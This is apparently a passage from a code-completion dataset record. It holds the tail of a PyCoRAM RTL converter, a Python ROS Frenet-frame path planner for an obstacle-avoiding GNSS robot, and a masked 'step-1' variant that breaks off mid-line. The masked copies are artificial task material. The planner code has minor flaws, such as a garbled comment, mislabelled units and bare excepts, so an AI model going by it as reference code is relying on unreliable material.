coram_object.items():\n print(\" CoRAM %s\" % mode)\n for threadname, idx, subid, addrwidth, datawidth in sorted(coram_items, key=lambda x:x[1]):\n print(\" %s(ID:%d%s Thread:%s AddrWidth:%s DataWidth:%s)\" %\n (mode, idx, ( '' if subid is None else ''.join( ('[', str(subid), ']') ) ),\n threadname, str(addrwidth), str(datawidth)))\n \n def generate(self):\n preprocess_define = []\n if self.single_clock:\n preprocess_define.append('CORAM_SINGLE_CLOCK')\n if self.define:\n preprocess_define.extend(self.define)\n\n code_parser = VerilogCodeParser(self.filelist,\n preprocess_include=self.include,\n preprocess_define=preprocess_define)\n ast = code_parser.parse()\n\n module_visitor = ModuleVisitor()\n module_visitor.visit(ast)\n modulenames = module_visitor.get_modulenames()\n moduleinfotable = module_visitor.get_moduleinfotable()\n\n instanceconvert_visitor = InstanceConvertVisitor(moduleinfotable, self.topmodule)\n instanceconvert_visitor.start_visit()\n\n replaced_instance = instanceconvert_visitor.getMergedReplacedInstance()\n replaced_instports = instanceconvert_visitor.getReplacedInstPorts()\n replaced_items = instanceconvert_visitor.getReplacedItems() \n\n new_moduleinfotable = instanceconvert_visitor.get_new_moduleinfotable()\n instancereplace_visitor = InstanceReplaceVisitor(replaced_instance, \n replaced_instports,\n replaced_items,\n new_moduleinfotable)\n ret = instancereplace_visitor.getAST()\n\n # gather user-defined io-ports on top-module and parameters to connect external\n frametable = instanceconvert_visitor.getFrameTable()\n top_ioports = []\n for i in moduleinfotable.getIOPorts(self.topmodule):\n if signaltype.isClock(i) or signaltype.isReset(i): continue\n top_ioports.append(i)\n\n top_scope = ScopeChain( [ScopeLabel(self.topmodule, 'module')] )\n top_sigs = frametable.getSignals(top_scope)\n top_params = frametable.getConsts(top_scope)\n\n for sk, sv in top_sigs.items():\n if len(sk) > 2: continue\n signame = sk[1].scopename\n for svv in sv:\n if (signame in top_ioports and \n not (signaltype.isClock(signame) or signaltype.isReset(signame)) and\n isinstance(svv, vast.Input) or isinstance(svv, vast.Output) or isinstance(svv, vast.Inout)):\n port = svv\n msb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.msb, top_scope))\n lsb_val = instanceconvert_visitor.optimize(instanceconvert_visitor.getTree(port.width.lsb, top_scope))\n width = int(msb_val.value) - int(lsb_val.value) + 1\n self.top_ioports[signame] = (port, width)\n break\n\n for ck, cv in top_params.items():\n if len(ck) > 2: continue\n signame = ck[1].scopename\n param = cv[0]\n if isinstance(param, vast.Genvar): continue\n self.top_parameters[signame] = param\n\n self.coram_object = instanceconvert_visitor.getCoramObject()\n\n return ret\n\ndef main():\n from optparse import OptionParser\n INFO = \"PyCoRAM RTL Converter\"\n VERSION = utils.version.VERSION\n USAGE = \"Usage: python rtlconverter.py -t TOPMODULE file ...\"\n\n def showVersion():\n print(INFO)\n print(VERSION)\n print(USAGE)\n sys.exit()\n \n optparser = OptionParser()\n optparser.add_option(\"-v\",\"--version\",action=\"store_true\",dest=\"showversion\",\n default=False,help=\"Show the version\")\n optparser.add_option(\"-t\",\"--top\",dest=\"topmodule\",\n default=\"userlogic\",help=\"Top module, Default=userlogic\")\n optparser.add_option(\"-o\",\"--output\",dest=\"outputfile\",\n default=\"out.v\",help=\"Output file name, Default=out.v\")\n optparser.add_option(\"-I\",\"--include\",dest=\"include\",action=\"append\",\n default=[],help=\"Include path\")\n optparser.add_option(\"-D\",dest=\"define\",action=\"append\",\n default=[],help=\"Macro Definition\")\n optparser.add_option(\"--singleclock\",action=\"store_true\",dest=\"single_clock\",\n default=False,help=\"Use single clock mode\")\n (options, args) = optparser.parse_args()\n\n filelist = args\n if options.showversion:\n showVersion()\n\n for f in filelist:\n if not os.path.exists(f): raise IOError(\"file not found: \" + f)\n\n if len(filelist) == 0:\n showVersion()\n\n converter = RtlConverter(filelist, options.topmodule,\n include=options.include, \n define=options.define,\n single_clock=options.single_clock)\n ast = converter.generate()\n converter.dumpCoramObject()\n \n asttocode = ASTCodeGenerator()\n code = asttocode.visit(ast)\n\n f = open(options.outputfile, 'w')\n f.write(code)\n f.close()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
#!/usr/bin/python2
# -*- coding: UTF-8 -*-
# coding: utf-8
#!/usr/bin/env python
'''
发布轨迹信息
path.x; path.y; c_speed;
'''
import numpy as np
import matplotlib.pyplot as plt
import copy
import math
from cubic_spline import Spline2D
from polynomials import QuarticPolynomial, QuinticPolynomial
import time
import rospy
from std_msgs.msg import String
from std_msgs.msg import Float32
from std_msgs.msg import Int32
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from local_planner.msg import localPath
from geometry_msgs.msg import PoseStamped, Quaternion
import tf
from CAN_driver.msg import Motor_Feedback
from GNSS_driver.msg import GNSS_CAN
import sys
# 参数
MAX_SPEED = 30.0 # 最大速度 [m/s]
MAX_ACCEL = 50.0 # 最大加速度 [m/ss]
MAX_CURVATURE = 30.0 # 最大曲率 [1/m]
MAX_ROAD_WIDTH = 10.0 # 最大道路宽度 [m]
D_ROAD_W = 2.0 # 路宽采样间隔 [m]
DT = 0.3 # Delta T[s]
MAXT = 6.0 # 最大预测时间 [m]
MINT = 4.0 # 最小预测时间 [m]
TARGET_SPEED = 15.0/3.6 # 目标速度 [m/s] 即纵向速度保持
D_T_S = 10.0/3.6 # 目标opo][]o][o][\o][o][o速度采样间隔 [m/s]
N_S_SAMPLE = 0.1 # 目标速度采样数量
ROBOT_RADIUS = 2.3 # 车辆半径 [m]
THRESH_DIST=0.01
# 损失函数权重
KJ = 0.8
KT = 0.1
KD = 20.0
KLAT = 0.8
KLON = 0.2
show_animation = True
Gob_x = []
Gob_y = []
#规划失败标志 1 决策层需要
PathFail_flag = 0
class FrenetPath:
def __init__(self):
self.t = []
self.d = []
self.d_d = []
self.d_dd = []
self.d_ddd = []
self.s = []
self.s_d = []
self.s_dd = []
self.s_ddd = []
self.cd = 0.0
self.cv = 0.0
self.cf = 0.0
self.x = []
self.y = []
self.yaw = []
self.ds = []
self.c = []
def calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):
frenet_paths = []
# generate path to each offset goal
for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):
# 采样,并对每一个目标配置生成轨迹
# Lateral motion planning
for Ti in np.arange(MINT, MAXT, DT):
fp = FrenetPath()
# 计算出关于目标配置di,Ti的横向多项式
lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)
fp.t = [t for t in np.arange(0.0, Ti, DT)]
fp.d = [lat_qp.calc_point(t) for t in fp.t]
fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]
fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]
fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]
# 纵向速度规划 (速度保持)
# Loongitudinal motion planning (Velocity keeping)
for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):
tfp = copy.deepcopy(fp)
lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)
tfp.s = [lon_qp.calc_point(t) for t in fp.t]
tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]
tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]
tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]
###########################################################
#高速时的损失函数
###########################################################
Jp = sum(np.power(tfp.d_ddd, 2)) # square of jerk
Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk
# square of diff from target speed
ds = (TARGET_SPEED - tfp.s_d[-1])**2
# 横向的损失函数
tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2
# 纵向的损失函数
tfp.cv = KJ * Js + KT * Ti + KD * ds
# 总的损失函数为d 和 s方向的损失函数乘对应的系数相加
#########################################################
#低速时的损失函数
#########################################################
# # 低速时的损失函数
# ltfp = copy.deepcopy(tfp)
# ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]
# Jp_s = sum(np.power(ltfp.d_sss, 2)) # square of jerk
# Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk
# # S = s1 - s0
# dS = tfp.s[-1] - s0
# #横向的损失函数
# tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2
# #纵向的损失函数
# tfp.cv = KJ * Js + KT * Ti + KD * ds
tfp.cf = KLAT * tfp.cd + KLON * tfp.cv
frenet_paths.append(tfp)
return frenet_paths
def calc_global_paths(fplist, csp):
for fp in fplist:
# calc global positions
for i in range(len(fp.s)):
ix, iy = csp.calc_position(fp.s[i])
if ix is None:
break
iyaw = csp.calc_yaw(fp.s[i])
di = fp.d[i]
fx = ix + di * math.cos(iyaw + math.pi / 2.0)
fy = iy + di * math.sin(iyaw + math.pi / 2.0)
fp.x.append(fx)
fp.y.append(fy)
# calc yaw and ds
for i in range(len(fp.x) - 1):
dx = fp.x[i + 1] - fp.x[i]
dy = fp.y[i + 1] - fp.y[i]
fp.yaw.append(math.atan2(dy, dx))
fp.ds.append(math.sqrt(dx**2 + dy**2))
fp.yaw.append(fp.yaw[-1])
fp.ds.append(fp.ds[-1])
# calc curvature
for i in range(len(fp.yaw) - 1):
fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])
return fplist
def check_collision(fp, ob):
for i in range(len(ob[:, 0])):
d = [((ix - ob[i, 0])**2 + (iy - ob[i, 1])**2)
for (ix, iy) in zip(fp.x, fp.y)]
collision = any([di <= ROBOT_RADIUS**2 for di in d])
if collision:
return False
return True
def check_paths(fplist, ob):
"""
check path above max speed, max a, does collision or not
"""
okind = []
for i in range(len(fplist)):
if any([v > MAX_SPEED for v in fplist[i].s_d]): # Max speed check
continue
elif any([abs(a) > MAX_ACCEL for a in fplist[i].s_dd]): # Max accel check
continue
elif any([abs(c) > MAX_CURVATURE for c in fplist[i].c]): # Max curvature check
continue
elif not check_collision(fplist[i], ob):
continue
okind.append(i)
return [fplist[i] for i in okind]
def frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):
ob = np.array(ob)
fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)
fplist = calc_global_paths(fplist, csp)
fplist = check_paths(fplist, ob)
# find minimum cost path
mincost = float("inf")
bestpath = None
for fp in fplist:
if mincost >= fp.cf:
mincost = fp.cf
bestpath = fp
return bestpath
def generate_road_widle(x,y):
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1)
road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_x.append(road_left_ix)
road_left_y.append(road_left_iy)
road_right_x.append(road_right_ix)
road_right_y.append(road_right_iy)
return road_left_x, road_left_y, road_right_x, road_right_y
def generate_target_course(x, y):
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1) #0.1
rx, ry, ryaw, rk = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
rx.append(ix)
ry.append(iy)
ryaw.append(csp.calc_yaw(i_s))
rk.append(csp.calc_curvature(i_s))
return rx, ry, ryaw, rk, csp
#######################################################################################
def load_global_path():
global zero_cord_x,zero_cord_y
bet = 0.1
blank = [] #buffer
white = [] #buffer
yellow = [] #buffer
GPS_x = [] #所采集预描点的x
GPS_y = [] #所采集预描点的x
#读取预描点
nums, ber = np.loadtxt("/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt", dtype=str, delimiter=',', unpack=True)
for i in range(len(nums)):
if not nums[i] in blank: #去除重复点
#blank.append(nums[i])
yellow.append(float(nums[i]))
white.append(float(ber[i]))
bx = yellow[0] #起始点坐标
by = white[0]
for i in range(len(yellow)):
dx = yellow[i] - bx
dy = white[i] - by
dis = math.sqrt(dx ** 2 + dy ** 2)
if dis > bet: #选取大于设定的距离的点
GPS_x.append(yellow[i]) #使cx,cy中点均满足要求
GPS_y.append(white[i])
bx = yellow[i]
by = white[i]
GPS_x = np.array(GPS_x) #将列表转换成数组
GPS_y = np.array(GPS_y)
#print("cx:",cx)
#print("cy:",cy)
zero_cord_x = GPS_x[0]
zero_cord_y = GPS_y[0]
GPS_x = GPS_x - zero_cord_x
GPS_y = GPS_y - zero_cord_y
plt.plot(GPS_x,GPS_y, "-r", label="GPS point ")
plt.plot()
plt.show()
return GPS_x, GPS_y
class Info(object):
def __init__(self):
self.CurrGPS_lat = float(-1)
self.CurrGPS_lon = float(-1)
self.CurrentVelocity = float(-1)
self.Target_Velocity = float(-1)
self.ImuYaw = float(-1)
self.Target_Theta = float(-1)
#self.CommandMessage = Car_Input()
self.gob = np.array([])
self.ob = np.array([])
self.gobx = np.array([])
self.goby = np.array([])
# Subscribers
rospy.Subscriber("coordinate", Point, self.FeedbackCallbackObs)
sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10) #订阅GPS数据
rospy.Subscriber("Motor_Feedback_mssage", Motor_Feedback,self.RVcallback,queue_size = 10)
def FeedbackCallbackGPSIMU(self, msg):
self.CurrGPS_lat = msg.latitude
self.CurrGPS_lon = msg.longitude
self.ImuYaw = (90-msg.course_angle)*np.pi/180
#print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)
def FeedbackCallbackObs(self, msg):
global Gob_x
global Gob_y
self.gobx = msg.x
self.goby = msg.y
#print("msg.x","msg.y", msg.x, msg.y)
Gob_x.append(self.gobx)
Gob_y.append(self.goby)
#print("Gob_x","Gob_y", Gob_x, Gob_y)
#np.append(self.gobx,5)
#np.append(self.goby,5)
self.gob = np.column_stack((Gob_x, Gob_y))
#print(self.gobx,self.goby)
#print(self.gob)
def RVcallback(self,msg):
self.CurrentVelocity = msg.Base_Vehspd
#print("*"*50)
#print("rv:",rv)
#rospy.loginfo('I heard: %s', data.data)
def init(self):
return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity
def talker(self,Target_Velocity, path_record):
self.rate = rospy.Rate(100) # 10hz
self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象
# 定义发布器 path_pub 发布 trajectory
self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50) #定义Publisher对象
self.pub_Velocity.publish(Target_Velocity)
# 发布路径
self.path_pub.publish(path_record)
#self.rate.sleep()
# def talker(self,Target_Velocity,Target_Theta):
# self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象
# self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)
# self.rate = rospy.Rate(100) # 10hz
# self.pub_Velocity.publish(Target_Velocity)
# self.pub_Steering.publish(Target_Theta)
# self.rate.sleep()
#######################################################################################
def get_transalation(curr_gps_lat,curr_gps_lon):
curr_posy=(float(curr_gps_lon)-zero_cord_y)
curr_posx=(float(curr_gps_lat)-zero_cord_x)
#print("curr_posy,curr_posx=",curr_posy,curr_posx)
return curr_posx, curr_posy
def get_transformation(pt,curr_yaw,T):
c, s = np.cos(curr_yaw), np.sin(curr_yaw)
R = (np.array(((c,-s), (s, c))))
pt=pt.dot(R)+T
return pt
def get_arc_length(tx,ty,st):
arc_length=0
for x in range(1,st):
arc_length=arc_length+(np.hypot((tx[x-1]-tx[x]),(ty[x-1]-ty[x])))
return arc_length
def get_lateral_dist(tx,ty,curr_posx,curr_posy):
dist=[]
for x in range(0,len(tx)-1):
dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))
lat_dist=min(dist)
st=dist.index(min(dist))
theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))
theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))
if lat_dist<THRESH_DIST:
lat_dist=0
curr_posx=tx[st]
curr_posy=ty[st]
if theta2<theta1:
lat_dist=-lat_dist
# print(lat_dist)
return st, lat_dist, curr_posx, curr_posy
def proportional_control(target, current):
#print("*"*50)
#print("current=",current)
#print("target - current",target - current)
a = 1.0 * (target - current)
return a
def main():
ptx = []
pty = []
ptx, pty = load_global_path()
tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)
#print(csp)
road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)
#当前车速及加速度
c_speed = 5.0/3.6
c_acc = 1.0
c_d_dd = 0
c_d_d = 0
area = 25.0 # animation area length [m]
start = time.time()
rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)
my_node = Info()
while not rospy.is_shutdown():
CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()
#print("gob",gob)
ob = []
if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):
#print(CurrGPS_lat,CurrGPS_lon,ImuYaw, curr_posx, curr_posy)
#print(gobx,goby,gob)
#path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
#s0 = path.s[1]
#c_d = path.d[1]
#c_d_d = path.d_d[1]
#c_d_dd = path.d_dd[1]
#c_speed = path.s_d[1]
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
T = [curr_posx, curr_posy]
curr_yaw = ImuYaw #+ math.pi / 2
if (len(gob) == 0):
ob = [[-20, -20]]
else:
ob = gob
ob_len = len(ob)-1
for x in xrange(0, ob_len):
#print("ob_transformation",ob)
ob = np.array(ob)
#ob[x, :] = .2 * ob[x, :]
ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)
#print("ob_transformation",ob)
#############################################################
# c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)
#spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
#curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
try:
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
s0 = get_arc_length(tx, ty, spt)
path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
c_speed = path.s_d[1]
#c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)
c_d_d = path.d_d[1]
c_d_dd = path.d_dd[1]
if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:
print("Goal")
c_speed = 0.0
break
if show_animation:
plt.cla()
plt.plot(tx, ty, "-.k")
plt.plot(road_left_x, road_left_y, "-k")
plt.plot(road_right_x, road_right_y, "-k")
plt.plot(ob[:, 0], ob[:, 1], "ob")
plt.plot(path.x[1:], path.y[1:], "-or")
plt.plot(path.x[1], path.y[1], "vc")
plt.xlim(path.x[1] - area, path.x[1] + area)
plt.ylim(path.y[1] - area, path.y[1] + area)
plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc="r", ec="k", head_width=0.5, head_length=1.0)
plt.title("v[km/h]:" + str(c_speed)[0:4])
plt.xlabel(u'x/m', fontsize=14) # 设置x轴,并设定字号大小
plt.ylabel(u'y/m', fontsize=14) # 设置y轴,并设定字号大小
plt.pause(0.0001)
####################规划成功###############
###########################################
PathFail_flag = 0
###########################################
except:
###############规划失败################
PathFail_flag = 1
print("Don't find optimal path")
################对障碍物堆栈清空############
############################################
############################################
global Gob_x
global Gob_y
Gob_x*=0
Gob_y*=0
############################################
############################################
###############################################################################
try:
'''
acc = proportional_control(6, CurrentVelocity)
temp1=path.yaw[1] `
temp2=curr_yaw
if temp1<0:
temp1=6.28+temp1
if temp2<0:
temp2=6.28+temp2
val = temp1-temp2
if val > 3.14:
val = val - 6.28
if val < -3.14:
val = val + 6.28
val = math.degrees(val)
if val > 50:
val = 50
if val < -50:
val = -50
my_node.talker(acc,val)
'''
path_record = localPath()
# 配置路径
for i in range(len(path.x[1:])):
#print("path_x",path.x[i])
path_record.path_x.append(path.x[i])
path_record.path_y.append(path.y[i])
# 路径数量限制
if len(path_record.path_x) > 10000:
path_record.path_x.pop(0)
path_record.path_y.pop(0)
# 发布路径`
my_node.talker(c_speed, path_record)
except:
print("local path send fail")
pass
#my_node.talker(c_speed, path.x[1:], path.y[1:])
#except:
# pass
print("Finish")
end = time.time()
#print("total time: ", end - start)
if show_animation:
plt.grid(True)
plt.show()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "4647a7d0996ceeef4f39cf3182ac3944d25cb349",
"index": 8197,
"step-1": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\n<mask token>\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\n<mask token>\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\n<mask token>\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = 